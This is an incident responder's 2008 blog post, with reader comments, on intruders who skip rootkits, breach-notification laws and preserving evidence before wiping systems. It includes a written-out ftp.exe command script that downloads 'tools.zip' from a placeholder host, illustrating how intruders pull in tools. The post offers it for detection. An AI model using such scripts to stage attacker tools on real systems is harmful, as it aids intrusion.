Sunday, August 24, 2008

The Demented Musings of an Incident Responder

I respond, therefore I am. H. Carvey, 2008

I thought I'd jot down some of the things I see from time to time in the field...

In some network infrastructures, there's no need to use rootkits or other obfuscation methods.

In fact, these attempts to hide an intruder's activity may actually get the intruder noticed...incorrectly programmed or implemented rootkits lead to BSoDs, which get you noticed. Look at some of the SQL injection attacks...not the ones you saw in the news, but the ones you didn't see...well, okay...if you didn't see them, then you can't look at them. I get it. Anyway, those other SQL injection attacks would punch completely through into the interior network infrastructure, and the intruder would end up on systems with privileges above Administrator. From there, they'd reach back out of the infrastructure to pull down their tools...via TFTP, FTP (the ftp.exe client on Windows systems is command-line-based and can run a script of commands), their own wget.exe, etc. The intruder would then use those tools to extend their reach...create user accounts, etc...and many times go unnoticed.
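As an aside on that ftp.exe scripting capability: the Windows client's -s: switch feeds it a file of commands, one per line, so a transfer can run unattended from a batch file with no one at the keyboard. The host, credentials, and file name below are purely illustrative (the address is from the RFC 5737 documentation range); this sketch just builds such a command script on a POSIX-ish shell so you can see the shape of it.

```shell
# Build the kind of command script that gets fed to ftp.exe.
# Host, login, and file name are made up for illustration.
cat > commands.txt <<'EOF'
open 192.0.2.10
anonymous
ftp@example.com
binary
get tools.zip
bye
EOF

# On a Windows box this would run unattended as:
#   ftp -s:commands.txt
echo "script has $(wc -l < commands.txt) lines"
```

Seeing ftp.exe invoked with -s: in a Prefetch file or process listing, with no interactive user logged on, is exactly the kind of artifact worth chasing down.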

However...while we are on the subject of rootkits...I was reading a post over on the Volatility Tumblr blog, and came across this interesting bit of analysis of the Storm bot from TippingPoint's Digital Vaccine Labs (DVL). Apparently, the rootkit capabilities of this malware were "copied" (their word, not mine) from existing code. The point of this is that some issues with rootkits are being solved by using existing, proven code. Symantec has a post on the Storm bot, showing that it doesn't just blow up on a system.

Many times, an organization's initial response exposes them to greater risk than the incident itself, simply by making it impossible to answer the necessary questions.

Perhaps more so than anything else, state notification laws (CA SB-1386, AB-1298, etc.) and compliance standards set forth by regulatory bodies ('nuff said!) are changing the face of incident response. What I mean is that just cleaning systems (running AV, deleting files and accounts, or simply wiping and reinstalling the system) is no longer an option, because now we need to know (a) whether there was "sensitive data" on the system, and (b) whether the malware or compromise led to the exposure of that data.

What this leads us to is that the folks closest to the systems...helpdesk, IT admins, etc...need to be trained in proper response techniques and activities. They need to have the knowledge and the tools in place in order to react quickly...like an EMT. For example, rather than pulling a system offline and wiping it, obtain a physical memory dump, disconnect the system from the network, obtain an image, and then wipe the system. Properly control, preserve, and maintain custody of the data so that forensic analysts can do their thing. This process is somewhat over-simplified, I know, but it's something that can be used as a basis for getting those important questions answered. Add to that network traffic captures and any available device logs, and you've pretty much got most of what incident responders such as myself are looking for when we are asked to respond.
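To make that admittedly over-simplified process a bit more concrete, here's a rough sketch of the evidence-handling side of it. The tool names in the comments (win32dd, FTK Imager Lite, a dd-style imager) and the paths are assumptions for illustration, not a prescribed procedure...the runnable part just demonstrates the last step: hash what you've acquired immediately and record it in a custody log.

```shell
#!/bin/sh
# Sketch of first-responder evidence handling. On the live box you would:
#   1. Capture physical memory FIRST (e.g., win32dd or FTK Imager Lite --
#      which tool is an assumption here; use whatever you've validated).
#   2. Pull the network cable (do not power the system down yet).
#   3. Acquire a disk image with a dd-style tool to sterile media.
# Then, for every item collected:
EVIDENCE=./memdump.raw
LOG=./custody.log

# Stand-in for an acquired memory image, so this sketch actually runs.
printf 'fake memory image contents' > "$EVIDENCE"

# Hash the evidence right away and record what/who/when, so a forensic
# analyst can later verify nothing changed while it was in transit.
HASH=$(sha256sum "$EVIDENCE" | awk '{print $1}')
printf '%s  %s  acquired-by=%s  date=%s\n' \
    "$HASH" "$EVIDENCE" "$(whoami)" "$(date -u +%Y-%m-%dT%H:%MZ)" >> "$LOG"

echo "logged $EVIDENCE with hash $HASH"
```

The point isn't the particular hashing tool; it's that the hash and the custody entry get made at acquisition time, not days later when someone finally asks who touched the drive.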

3 comments:

Neil Carpenter said...

"In some network infrastructures, there's no need to use rootkits or other obfuscation methods."

This is true more often than not. Customers don't take it well when they hear that their network has been compromised for months (years) and they never noticed.

Anonymous said...

As long as customers don't know and don't notice, you can do whatever you want... /lagerhall

hogfly said...

Harlan,

Couldn't agree more. Training is vital; however, it's not just training that people need, it's regular, repetitive training, much like military methods...drilling actions into the 'first responders' so they do what they're told when things start to happen.

Regarding obfuscation and hiding tracks, I think we saw a lot of this really take off a few years back, when attackers just splattered systems and didn't bother to hide. They didn't need to...they realized that attempting to hide in a smaller number of targets that may be of higher intrinsic value is less effective than widespread infection of less valuable targets, gaining value through quantity rather than quality. This still holds true today. Of course, there are those out there who get the big scores.

Computers are no longer a luxury, they are a requirement and people just want them to work, they no longer care how they work, so they stopped looking under the hood. Curiosity is not cost effective. These attacks go unnoticed for this reason. Like our cars, people assume everything is ok if they can get from point A to B. We take it to the mechanic when we notice something is wrong, but had we looked under the hood, we may have noticed that the belts were worn to the point of snapping and the battery terminals were corroded. Unless people see something that's blatantly out of the ordinary, everything must be fine and the systems are safe as long as they are operational.